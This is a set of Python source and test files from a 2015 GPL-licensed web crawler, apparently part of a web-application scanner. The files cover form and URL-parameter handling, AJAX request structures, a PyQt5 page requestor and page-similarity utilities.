122 | self.database.insert_form(SESSION,form, WEBPAGE_ID)
123 | self.assertEqual(self.database.forms.count(), 1)
124 |
125 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"])
126 | form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
127 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
128 | self.database.insert_form(SESSION,form, WEBPAGE_ID)
129 | self.assertEqual(self.database.forms.count(), 1)
130 |
131 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas, Edgar"])
132 | form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
133 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
134 | self.database.insert_form(SESSION,form, WEBPAGE_ID)
135 | self.assertEqual(self.database.forms.count(), 1)
136 |
137 |
138 | expected_form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
139 | form1 = self.database.get_all_forms_to_page_id_from_db(SESSION,WEBPAGE_ID)[0]
140 | self.assertEqual(form1.toString(), expected_form.toString())
141 |
142 | def test_not_similar_forms(self):
143 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Thomas"])
144 | form_input2 = FormInput("INPUT", "Test3", input_type="text", values=["Mueller"])
145 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
146 | self.database.insert_form(SESSION,form, WEBPAGE_ID)
147 | self.assertEqual(self.database.forms.count(), 1)
148 |
149 | form_input1 = FormInput("INPUT", "Test1", input_type="text", values=["Edgar"])
150 | form_input2 = FormInput("INPUT", "Test2", input_type="text", values=["Mueller"])
151 | form = HtmlForm([form_input1,form_input2], TEST_URL1, "POST", dom_address= None)
152 | self.database.insert_form(SESSION,form, WEBPAGE_ID)
153 | self.assertEqual(self.database.forms.count(), 2)
154 |
155 | def test_web_page_extend_ajax(self):
156 | web_page = deepcopy(WEBPAGE)
157 | clickable = deepcopy(CLICKABLE)
158 | web_page.clickables.extend([clickable])
159 | self.database.insert_page_into_db(SESSION, web_page)
160 | ajax = deepcopy(AJAXREQUEST)
161 | self.database.extend_ajax_requests_to_webpage(SESSION, web_page, [ajax])
162 |
163 | web_page.ajax_requests = [ajax]
164 | test_page = self.database.get_webpage_to_url_from_db(SESSION, web_page.url)
165 | self.assertEqual(web_page.toString(),test_page.toString())
166 | self.assertEqual(web_page.ajax_requests[0], ajax)
167 |
168 |
169 |
170 | if __name__ == '__main__':
171 | unittest.main()
172 |
--------------------------------------------------------------------------------
/crawler/tests/domainhandlertest.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from database.databasemanager import DatabaseManager
19 | from models.urlstructure import ParameterType
20 | from utils.domainhandler import DomainHandler
21 | from utils.user import User
22 |
23 | __author__ = 'constantin'
24 |
25 | import unittest
26 |
27 |
28 | class DomainHandlerTest(unittest.TestCase):
29 |
30 | def setUp(self):
31 | self.persistence_manager = DatabaseManager(User("DummyUser", 0))
32 | self.domain_handler = DomainHandler("example.com", self.persistence_manager)
33 |
34 | def test_a_parameter_calculation(self):
35 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "a"), ParameterType.Char)
36 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "4"), ParameterType.Digit)
37 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "afd"), ParameterType.String)
38 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "1.5"), ParameterType.Float)
39 | self.assertEqual(self.domain_handler.calculate_new_url_type(None, "42342"), ParameterType.Integer)
40 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "a"), ParameterType.Char)
41 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "1"), ParameterType.Digit)
42 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "12"), ParameterType.Integer)
43 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "42.5"), ParameterType.Float)
44 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc"), ParameterType.AlphaNumerical)
45 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Digit, "abc123"), ParameterType.AlphaNumerical)
46 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "a"), ParameterType.AlphaNumerical)
47 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1"), ParameterType.Float)
48 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "1.5"), ParameterType.Float)
49 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc"), ParameterType.AlphaNumerical)
50 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "abc123"), ParameterType.AlphaNumerical)
51 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17"), ParameterType.Float)
52 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Float, "17.5"), ParameterType.Float)
53 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "a"), ParameterType.AlphaNumerical)
54 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14"), ParameterType.Integer)
55 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "14.5"), ParameterType.Float)
56 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Integer, "abc123"), ParameterType.AlphaNumerical)
57 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "a"), ParameterType.Char)
58 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "4"), ParameterType.Char)
59 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14"), ParameterType.AlphaNumerical)
60 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "14.5"), ParameterType.AlphaNumerical)
61 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc"), ParameterType.AlphaNumerical)
62 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.Char, "abc123"), ParameterType.AlphaNumerical)
63 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "a"), ParameterType.String)
64 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc"), ParameterType.String)
65 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "1"), ParameterType.AlphaNumerical)
66 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "2.3"), ParameterType.AlphaNumerical)
67 | self.assertEqual(self.domain_handler.calculate_new_url_type(ParameterType.String, "abc123"), ParameterType.AlphaNumerical)
68 |
69 |
70 | def test_b_create_url_function(self):
71 | url = self.domain_handler.handle_url("http://example.com/test.php?a=5&b=abc")
72 | url_desc = self.persistence_manager.get_url_structure(url.url_hash)
73 | self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.String)
74 | self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit)
75 | self.assertEqual(url.get_values_to_parameter("a")[0], "5")
76 | self.assertEqual(url.get_values_to_parameter("b")[0], "abc")
77 |
78 |
79 | url = self.domain_handler.handle_url("test.php?a=7&b=abc123", "http://example.com")
80 | url_desc = self.persistence_manager.get_url_structure(url.url_hash)
81 | self.assertEqual(url_desc.get_parameter_type("b"), ParameterType.AlphaNumerical)
82 | self.assertEqual(url_desc.get_parameter_type("a"), ParameterType.Digit)
83 | self.assertEqual(url.domain, "example.com")
84 | self.assertEqual(url.path, "/test.php")
85 | self.assertEqual(url.scheme, "http")
86 | self.assertEqual(len(url.parameters), 2)
87 | self.assertEqual(url.get_values_to_parameter("a")[0], "7")
88 | self.assertEqual(url.get_values_to_parameter("b")[0], "abc123")
89 |
90 | with self.assertRaises(KeyError):
91 | url.get_values_to_parameter("zzz")
92 |
93 |
94 |
95 | if __name__ == '__main__':
96 | unittest.main()
97 |
--------------------------------------------------------------------------------
/crawler/utils/__init__.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
--------------------------------------------------------------------------------
/crawler/utils/asyncrequesthandler.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 | import logging
18 | from models.asyncrequeststructure import AsyncRequestStructure
19 | from models.parametertype import ParameterType
20 | from utils.utils import calculate_new_parameter_type
21 |
22 |
23 |
24 | class AsyncRequestHandler():
25 |
26 | def __init__(self, database_manager):
27 | self.database_manager = database_manager
28 |
29 | def handle_requests(self, web_page):
30 | for async_request in web_page.ajax_requests + web_page.timing_requests:
31 | request_hash = async_request.request_hash
32 | ajax_structure = self.database_manager.get_asyncrequest_structure(request_hash)
33 | if ajax_structure is None:
34 | new_parameters = {}
35 | parameters = async_request.parameters
36 | try:
37 | for key, value in parameters.items():
38 | param_type = calculate_new_parameter_type(None, value)
39 | new_parameters[key] = {"parameter_type": param_type.value}
40 | async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters)
41 | except AttributeError:
42 | async_request.request_structure = AsyncRequestStructure(request_hash, None)
43 | else:
44 | new_parameters = {}
45 | if async_request.parameters is not None:
46 | try:
47 | for key, value in async_request.parameters.items():
48 | param_type = calculate_new_parameter_type(ParameterType(ajax_structure.parameters[key]['parameter_type']), value)
49 | new_parameters[key] = {"parameter_type": param_type.value}
50 | async_request.request_structure = AsyncRequestStructure(request_hash, new_parameters)
51 | except AttributeError:
52 | logging.error("AttributeError with request: {}, Key: {}, Value: {}".format(request_hash, key, value))
53 | async_request.request_structure = ajax_structure
54 | except KeyError:
55 | logging.debug("KeyError with request: {}, Key: {}, Value: {}".format(request_hash, key, value))
56 | async_request.request_structure = ajax_structure
57 | else:
58 | async_request.request_structure = ajax_structure
59 | return web_page
60 |
61 |
62 |
63 |
64 |
--------------------------------------------------------------------------------
/crawler/utils/config.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 |
17 | This class contains everything that is important for a crawl session:
18 | - name
19 | - start_page - is the start page, where the crawler should start
20 | - max_depth - How deep the crawler should go
21 | - max_click_depth - How deep a crawler should click
22 | - speed - interaction speed between Jäk and JS
23 |
24 | '''
25 | from models.utils import CrawlSpeed
26 |
27 | class CrawlConfig():
28 |
29 | def __init__(self, name, start_page, max_depth = 5, max_click_depth = 5, crawl_speed=CrawlSpeed.Medium):
30 | self.name = name
31 | self.max_depth = max_depth
32 | self.max_click_depth = max_click_depth
33 | self.start_page_url = start_page
34 | self.process_speed = crawl_speed
35 |
36 |
37 |
38 | class AttackConfig():
39 | """
40 | Right now more a dummy than something usefull
41 | """
42 | def __init__(self, start_page_url, crawl_speed=CrawlSpeed.Medium):
43 | attack = "XSS"
44 | self.start_page_url = start_page_url
45 | self.process_speed = crawl_speed
46 |
47 |
--------------------------------------------------------------------------------
/crawler/utils/execptions.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | class LoginFormNotFound(Exception):
19 | def __init__(self, value):
20 | self.value = value
21 | def __str__(self):
22 | return repr(self.value)
23 |
24 | class PageNotFound(Exception):
25 | def __init__(self, value):
26 | self.value = value
27 | def __str__(self):
28 | return repr(self.value)
29 |
30 | class LoginFailed(Exception):
31 | def __init__(self, value):
32 | self.value = value
33 | def __str__(self):
34 | return repr(self.value)
35 |
36 | class ElementNotFound(Exception):
37 | def __init__(self, value):
38 | self.value = value
39 | def __str__(self):
40 | return repr(self.value)
41 |
42 | class DomainHandlerNotSet(Exception):
43 | def __init__(self, value):
44 | self.value = value
45 | def __str__(self):
46 | return repr(self.value)
47 |
--------------------------------------------------------------------------------
/crawler/utils/requestor.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 | from time import time, sleep
19 | import logging
20 |
21 | from PyQt5.Qt import QEventLoop, QTimer, QUrl
22 |
23 | from core.interactioncore import InteractionCore
24 | from models.utils import CrawlSpeed
25 |
26 |
27 | class Requestor(InteractionCore):
28 | def __init__(self, parent, proxy, port, crawl_speed = CrawlSpeed.Medium):
29 | super(Requestor, self).__init__(parent, proxy, port, crawl_speed)
30 | self.app = parent.app
31 |
32 | def _loadFinished(self, resutl):
33 | #logging.debug("{} Subframes found".format(self.mainFrame().childFrames()))
34 | #logging.debug(self.mainFrame().toHtml())
35 | pass
36 |
37 | def get(self, qurl, html=None, num_retries=1, delay = 10, timeout = 10):
38 | t1 = time()
39 |
40 | loop = QEventLoop()
41 | timer = QTimer()
42 | timer.setSingleShot(True)
43 | timer.timeout.connect(loop.quit)
44 | self.loadFinished.connect(loop.quit)
45 | if qurl:
46 | if html:
47 | self.setHtml(html, qurl)
48 | else:
49 | self.mainFrame().load(QUrl(qurl))
50 | timer.start(timeout * 1000)
51 | loop.exec_() # delay here until download finished or timeout
52 |
53 | if timer.isActive():
54 | # downloaded successfully
55 | timer.stop()
56 | self._wait(delay - (time() - t1))
57 | parsed_html = self.mainFrame().toHtml()
58 | else:
59 | # did not download in time
60 | if num_retries > 0:
61 | logging.debug('Timeout - retrying')
62 | parsed_html = self.get(qurl, num_retries=num_retries-1, timerout=timeout, delay=delay)
63 | else:
64 | logging.debug('Timed out')
65 | parsed_html = ''
66 | self.mainFrame().setHtml(None)
67 | return parsed_html
68 |
69 | def _wait(self, timeout=1, pattern=None):
70 | """Wait for delay time
71 | """
72 | deadline = time() + timeout
73 | while time() < deadline:
74 | sleep(0)
75 | self.app.processEvents()
76 |
77 | def javaScriptConsoleMessage(self, message, lineNumber, sourceID):
78 | logging.debug("Console: " + message + " at: " + str(lineNumber))
79 |
80 | def __del__(self):
81 | pass
--------------------------------------------------------------------------------
/crawler/utils/user.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 |
17 |
18 | This class contains everything, that is important for a user. It specifies, mainly the login behaviour.
19 | Notice: A crawl session(one config) can have multiple users
20 | - username - for identifying later the user
21 | - user_level - can be interesting for later comparison for different views
22 | - url_with_login_form - what can that be??
23 | - login_data = dict, that contains mainly username and password
24 |
25 | '''
26 |
27 | import uuid
28 |
29 |
30 | class User():
31 |
32 | def __init__(self, username, user_level, url_with_login_form=None, login_data=None, session=uuid.uuid4()):
33 | self.login_data = login_data
34 | self.username = username
35 | self.url_with_login_form = url_with_login_form
36 | self.user_level = user_level
37 | self.session = session
--------------------------------------------------------------------------------
/crawler/utils/utils.py:
--------------------------------------------------------------------------------
1 | '''
2 | Copyright (C) 2015 Constantin Tschuertz
3 |
4 | This program is free software: you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation, either version 3 of the License, or
7 | any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program. If not, see .
16 | '''
17 |
18 |
19 | import logging
20 | import string
21 | from Cython.Compiler.Options import normalise_encoding_name
22 | from PyQt5.QtCore import QUrl
23 | from PyQt5.QtNetwork import QNetworkCookie
24 |
25 | from models.deltapage import DeltaPage
26 | from models.parametertype import ParameterType
27 |
28 |
29 | def form_to_dict(form, key_values = None):
30 | result = {}
31 | QStr
32 | for elem in form.parameter:
33 | if elem.name == "redirect_to":
34 | continue
35 | if elem.name not in key_values:
36 | result[elem.name] = elem.values
37 | else:
38 | result[elem.name] = key_values[elem.name]
39 | return result
40 |
41 |
42 | #substract the page-parameters in the parent-class from the delta-class
43 | def subtract_parent_from_delta_page(parent_page, delta_page):
44 | result = DeltaPage(delta_page.id, delta_page.url, delta_page.html, cookiesjar=delta_page.cookiejar, depth=delta_page.current_depth, generator=delta_page.generator, parent_id=delta_page.parent_id)
45 | result.delta_depth = delta_page.delta_depth
46 | for link in delta_page.links:
47 | if link not in parent_page.links:
48 | result.links.append(link)
49 |
50 | for d_clickable in delta_page.clickables:
51 | clickable_is_already_in_main = False
52 | for m_clickable in parent_page.clickables:
53 | if d_clickable == m_clickable:
54 | clickable_is_already_in_main = True
55 | break
56 | if clickable_is_already_in_main == False:
57 | result.clickables.append(d_clickable)
58 |
59 | for d_form in delta_page.forms:
60 | form_is_already_in_main = False
61 | for m_form in parent_page.forms:
62 | if two_forms_are_equal(d_form, m_form):
63 | form_is_already_in_main = True
64 | break
65 | if form_is_already_in_main == False:
66 | result.forms.append(d_form)
67 |
68 | result.ajax_requests = delta_page.ajax_requests # They are just capturing the new one
69 | return result
70 |
71 | def transfer_clicked_from_parent_to_delta(parent_page, delta_page):
72 | for d_clickabe in delta_page.clickables:
73 | if not d_clickabe.clicked:
74 | for p_clickable in parent_page.clickables:
75 | if d_clickabe == p_clickable:
76 | d_clickabe.clicked = p_clickable.clicked # If both are equel, transfer the clickstate from parent to child
77 |
78 | return delta_page
79 |
80 | def calculate_similarity_between_pages(page1, page2, clickable_weight = 1.0, form_weight = 1.0, link_weight = 1.0, verbose= True):
81 |
82 | if page1.toString() == page2.toString():
83 | return 1.0
84 |
85 | form_similarity = 0.0
86 | identical_forms = 0.0
87 | form_counter = len(page1.forms) + len(page2.forms)
88 | if form_counter > 0:
89 | for p1_form in page1.forms:
90 | is_in_other = False
91 | for p2_form in page2.forms:
92 | if two_forms_are_equal(p1_form, p2_form):
93 | is_in_other = True
94 | break
95 | if is_in_other:
96 | identical_forms += 1.0
97 | form_counter -= 1.0
98 | form_similarity = identical_forms / form_counter
99 | else:
100 | form_weight = 0.0
101 |
102 | link_similarity = 0.0
103 | identical_links = 0.0
104 | link_counter = len(page1.links) + len(page2.links)
105 | if link_counter > 0:
106 | for p1_link in page1.links:
107 | is_in_other = False
108 | for p2_link in page2.links:
109 | if p1_link.url.abstract_url == p2_link.url.abstract_url:
110 | is_in_other = True
111 | break
112 | if is_in_other:
113 | identical_links += 1.0
114 | link_counter -= 1.0
115 | link_similarity = identical_links / link_counter
116 | else:
117 | #logging.debug("Linkweight is 0.0")
118 | link_weight = 0.0
119 |
120 | clickable_similarity = 0.0
121 | identical_clickables = 0.0
122 | clickable_counter = len(page1.clickables) + len(page2.clickables)
123 | if clickable_counter > 0:
124 | for p1_clickable in page1.clickables:
125 | is_in_other = False
126 | for p2_clickable in page2.clickables:
127 | if two_clickables_are_equal(p1_clickable, p2_clickable):
128 | is_in_other = True
129 | break
130 | if is_in_other:
131 | identical_clickables += 1.0
132 | clickable_counter -= 1.0
133 | clickable_similarity = identical_clickables / clickable_counter
134 | else:
135 | clickable_weight = 0
136 |
137 | sum_weight = clickable_weight + form_weight + link_weight
138 | similarity= clickable_weight * clickable_similarity + form_weight * form_similarity + link_weight * link_similarity
139 | if sum_weight > 0:
140 | result = similarity / sum_weight
141 | else:
142 | result = 1
143 | if verbose:
144 | f = open("similarities/" + str(page1.id) + " - " + str(page2.id) + ".txt", "w")
145 | f.write(page1.toString())
146 | f.write(" \n \n ======================================================= \n \n")
147 | f.write(page2.toString())
148 | f.write("\n \n ====================Result=========================== \n \n")
149 | f.write("Similarity = " + str(result) + " - Formsimilarity: " + str(form_similarity) + " - Linksimilarity: " + str(link_similarity) + " - Clickablesimilarity: " + str(clickable_similarity))
150 | f.write("\n Formweight: "+ str(form_weight) + " Formnum: " +str(form_counter) + " - Linkweight: " + str(link_weight) + " Linknum: " + str(link_counter) + " - Clickableweight: " + str(clickable_weight) + " Clickablenum: " + str(clickable_counter) )
151 | f.close()
152 | #logging.debug("PageID: " + str(page1.id) + " and PageID: " + str(page2.id) + " has a similarity from: " + str(result))
153 |
154 | return result
155 |
156 | def two_clickables_are_equal(c1, c2):
157 | tmp = c1.event == c2.event and c1.dom_address == c2.dom_address and c1.tag == c2.tag
158 | if c1.clickable_type is not None and c2.clickable_type is not None:
159 | tmp = tmp and c1.clickable_type == c2.clickable_type
160 | return tmp
161 |
162 | def two_forms_are_equal(form1, form2):
163 | return form1.form_hash == form2.form_hash and form1.action.abstract_url == form2.action.abstract_url
164 |
165 | def count_cookies(networkaccess_manager, url):
166 | try:
167 | url = url.toString()
168 | except AttributeError:
169 | url = url
170 | cookiejar = networkaccess_manager.cookieJar()
171 | all_cookies = cookiejar.cookiesForUrl(QUrl(url))
172 | return len(all_cookies)
173 |
174 |
175 |
176 | def calculate_new_parameter_type(current_type, value):
177 | if current_type is None: # When we see it the first time, then we just set this param to None
178 | if len(value) == 1:
179 | if value in string.ascii_lowercase + string.ascii_uppercase + "/":
180 | return ParameterType.Char
181 | elif _is_int(value):
182 | return ParameterType.Digit
183 | elif _is_float(value):
184 | return ParameterType.Float
185 | else:
186 | raise ValueError("Len is one but I have not specified a case for: {}".format(value))
187 | else:
188 | if _is_int(value):
189 | return ParameterType.Integer
190 | elif _is_float(value):
191 | return ParameterType.Float
192 | elif isinstance(value, str):
193 | if _has_number(value):
194 | return ParameterType.AlphaNumerical
195 | else:
196 | return ParameterType.String
197 | else:
198 | raise ValueError("Is ling but not specified...")
199 |
200 | else:
201 | if current_type == ParameterType.Digit:
202 | return _handle_digit(value)
203 | elif current_type == ParameterType.Float:
204 | return _handle_float(value)
205 | elif current_type == ParameterType.Char:
206 | return _handle_char(value)
207 | elif current_type == ParameterType.Integer:
208 | return _handle_integer(value)
209 | elif current_type == ParameterType.String:
210 | return _handle_string(value)
211 | else:
212 | return ParameterType.AlphaNumerical # One time alphanumerical everytime alphanumerical
213 |
214 |
215 | def _is_int(value):
216 | try:
217 | int(value)
218 | return True
219 | except ValueError:
220 | return False
221 |
222 | def _is_float(value):
223 | try:
224 | float(value)
225 | return True
226 | except ValueError:
227 | return False
228 |
229 | def _has_number(input):
230 | return any(_is_int(char) or _is_float(char) for char in input)
231 |
232 | def _handle_digit(value):
233 | if len(value) == 1:
234 | if _is_int(value):
235 | return ParameterType.Digit
236 | if _is_float(value):
237 | return ParameterType.Float
238 | if value in string.ascii_uppercase + string.ascii_lowercase:
239 | return ParameterType.Char
240 | else:
241 | if _is_int(value):
242 | return ParameterType.Integer
243 | if _is_float(value):
244 | return ParameterType.Float
245 | else:
246 | return ParameterType.AlphaNumerical
247 |
248 | def _handle_float(value):
249 | if _is_float(value) or _is_int(value):
250 | return ParameterType.Float
251 | if isinstance(value, str):
252 | return ParameterType.AlphaNumerical
253 | else:
254 | raise ValueError("{}".format(value))
255 |
256 |
257 | def _handle_char(value):
258 | if len(value) == 1:
259 | return ParameterType.Char
260 | else:
261 | return ParameterType.AlphaNumerical
262 |
263 | def _handle_integer(value):
264 | if _is_int(value):
265 | return ParameterType.Integer
266 | elif _is_float(value):
267 | return ParameterType.Float
268 | else:
269 | return ParameterType.AlphaNumerical
270 |
271 | def _handle_string(value):
272 | if _has_number(value):
273 | return ParameterType.AlphaNumerical
274 | else:
275 | return ParameterType.String
276 |
277 | def print_to_file(self, item, filename):
278 | f = open("result/"+filename, "w")
279 | f.write(item)
280 | f.close()
--------------------------------------------------------------------------------
|